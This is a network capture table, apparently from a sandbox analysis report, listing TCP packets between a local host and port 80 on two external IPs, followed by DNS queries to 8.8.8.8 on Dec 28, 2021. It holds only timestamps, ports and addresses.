Dec 28, 2021 13:56:02.954832077 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954835892 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954855919 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954880953 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954906940 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954916954 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954933882 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954957008 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954966068 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.954982042 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.954993963 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955003977 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955022097 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955034018 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955043077 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955066919 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955076933 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955090046 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955106020 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955127954 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955132008 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955149889 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955173016 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955178976 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955195904 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955214024 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955219030 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955239058 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955241919 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955267906 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955281019 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955290079 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955312014 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955334902 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955354929 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955354929 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955379009 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955384016 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955401897 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955425024 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955430984 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955447912 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955471992 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955476046 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955493927 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955518961 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955533028 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955540895 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955563068 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955579996 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:02.955585003 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:02.955615044 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.000761986 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.131752014 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.131793976 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.131814957 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.131836891 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.131856918 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.131877899 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.132602930 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.132642984 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135246992 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135282993 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135298967 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135314941 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135330915 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135346889 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135363102 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135380030 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135396004 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135411978 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135428905 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135445118 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135461092 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135478020 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135493994 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135509014 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135531902 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135550022 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135570049 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135591030 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135610104 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135628939 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135646105 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135652065 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135674000 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135695934 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135715008 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135720015 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135740995 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135752916 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135761023 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135773897 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135782003 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135803938 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135813951 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135824919 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135843992 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135848045 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135864973 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135886908 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135917902 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135935068 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135915995 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135958910 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.135977983 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.135979891 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.136002064 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.136017084 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.136023998 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.136039019 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.136044979 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.136066914 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.136081934 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.136111975 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.180721045 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.180747032 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.180799961 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.312459946 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.312522888 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.312582016 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.312637091 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.312691927 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.312710047 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.312747955 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.312846899 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.312922001 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.315823078 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.315901995 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.315962076 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316018105 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316032887 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316076040 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316132069 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316160917 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316189051 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316242933 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316246033 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316303015 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316310883 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316359997 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316417933 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316457987 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316473007 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316533089 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316579103 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316591024 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316647053 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316678047 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316705942 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316761971 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316812038 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316818953 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316900015 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.316920996 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.316978931 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317033052 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317080975 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.317090034 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317147017 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317181110 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.317203999 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317260981 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317307949 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.317317009 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317373037 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317430019 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317483902 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317534924 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.317543983 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317603111 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317662001 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317687988 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.317723036 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317778111 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317787886 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.317835093 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317892075 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.317924023 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.317949057 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.318006039 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.318048000 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.318063021 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.318120956 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.318126917 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.318178892 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.318207026 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.360155106 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.360575914 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.360649109 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.360810041 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.492398977 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.492445946 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.492486954 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.492510080 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.492526054 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.492568016 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.492592096 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.492608070 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.492688894 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.497859001 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.497884989 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.497920990 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.497958899 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.497987032 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.497996092 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498033047 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498047113 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498070955 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498104095 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498115063 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498167038 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498203993 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498209953 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498249054 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498275042 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498291016 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498333931 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498348951 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498389006 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498452902 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498490095 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498491049 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498536110 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498577118 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498584986 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498634100 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498665094 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498672962 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498720884 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498734951 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498756886 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498809099 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498816013 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498858929 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498903990 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498945951 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.498975039 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.498984098 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.499022007 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.499053001 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.499057055 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.499087095 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.499103069 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.499140024 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.499181032 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.499218941 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.499219894 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:03.499258041 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.499325037 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.499483109 CET	49845	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:03.680964947 CET	80	49845	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:04.677983046 CET	49854	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:04.853571892 CET	80	49854	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:04.853709936 CET	49854	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:04.853841066 CET	49854	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:04.853857994 CET	49854	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:05.029736042 CET	80	49854	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:05.407126904 CET	80	49854	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:05.407718897 CET	49854	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:05.408015966 CET	49854	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:05.583499908 CET	80	49854	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:05.797780037 CET	49857	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:05.971755981 CET	80	49857	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:05.971923113 CET	49857	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:05.972120047 CET	49857	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:05.972239017 CET	49857	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:06.145884991 CET	80	49857	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:06.145912886 CET	80	49857	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:06.542974949 CET	80	49857	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:06.543010950 CET	80	49857	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:06.543235064 CET	49857	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:06.543468952 CET	49857	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:06.568718910 CET	49858	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:06.717175961 CET	80	49857	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:06.744278908 CET	80	49858	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:06.744411945 CET	49858	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:06.744535923 CET	49858	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:06.747188091 CET	49858	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:06.919797897 CET	80	49858	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:06.922748089 CET	80	49858	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:07.296400070 CET	80	49858	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:07.296542883 CET	49858	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:07.296766043 CET	49858	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:07.328165054 CET	49859	80	192.168.2.4	54.38.220.85
Dec 28, 2021 13:56:07.345786095 CET	80	49859	54.38.220.85	192.168.2.4
Dec 28, 2021 13:56:07.345982075 CET	49859	80	192.168.2.4	54.38.220.85
Dec 28, 2021 13:56:07.346076012 CET	49859	80	192.168.2.4	54.38.220.85
Dec 28, 2021 13:56:07.363641977 CET	80	49859	54.38.220.85	192.168.2.4
Dec 28, 2021 13:56:07.363667965 CET	80	49859	54.38.220.85	192.168.2.4
Dec 28, 2021 13:56:07.389439106 CET	49860	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:07.407290936 CET	49859	80	192.168.2.4	54.38.220.85
Dec 28, 2021 13:56:07.471921921 CET	80	49858	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:07.566694975 CET	80	49860	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:07.568984985 CET	49860	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:07.569057941 CET	49860	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:07.569075108 CET	49860	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:07.746212006 CET	80	49860	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:08.121371984 CET	80	49860	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:08.121557951 CET	49860	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:08.121598959 CET	49860	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:08.298798084 CET	80	49860	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:08.505099058 CET	49861	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:08.680519104 CET	80	49861	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:08.680932045 CET	49861	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:08.681101084 CET	49861	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:08.681123972 CET	49861	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:08.857285976 CET	80	49861	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:09.237057924 CET	80	49861	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:09.237087965 CET	80	49861	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:09.241233110 CET	49861	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:09.244057894 CET	49861	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:09.272557020 CET	49862	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:09.425185919 CET	80	49861	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:09.457170963 CET	80	49862	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:09.457437038 CET	49862	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:09.457644939 CET	49862	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:09.457726955 CET	49862	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:09.641184092 CET	80	49862	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:09.641207933 CET	80	49862	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:10.024442911 CET	80	49862	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:10.024472952 CET	80	49862	47.251.11.252	192.168.2.4
Dec 28, 2021 13:56:10.024642944 CET	49862	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:10.025221109 CET	49862	80	192.168.2.4	47.251.11.252
Dec 28, 2021 13:56:10.206131935 CET	80	49862	47.251.11.252	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2021 13:54:48.219171047 CET	55854	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:48.238013029 CET	53	55854	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:48.989533901 CET	64549	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:49.006606102 CET	53	64549	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:49.761595964 CET	63153	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:50.092185020 CET	53	63153	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:50.835154057 CET	53700	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:50.853662968 CET	53	53700	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:51.612792015 CET	51726	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:51.631757021 CET	53	51726	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:52.366228104 CET	56794	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:52.385042906 CET	53	56794	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:53.156251907 CET	56534	53	192.168.2.4	8.8.8.8
Dec 28, 2021 13:54:53.443387985 CET	53	56534	8.8.8.8	192.168.2.4
Dec 28, 2021 13:54:55.404691935 CET	56627	53	192.168.2.4	8.8.8.8
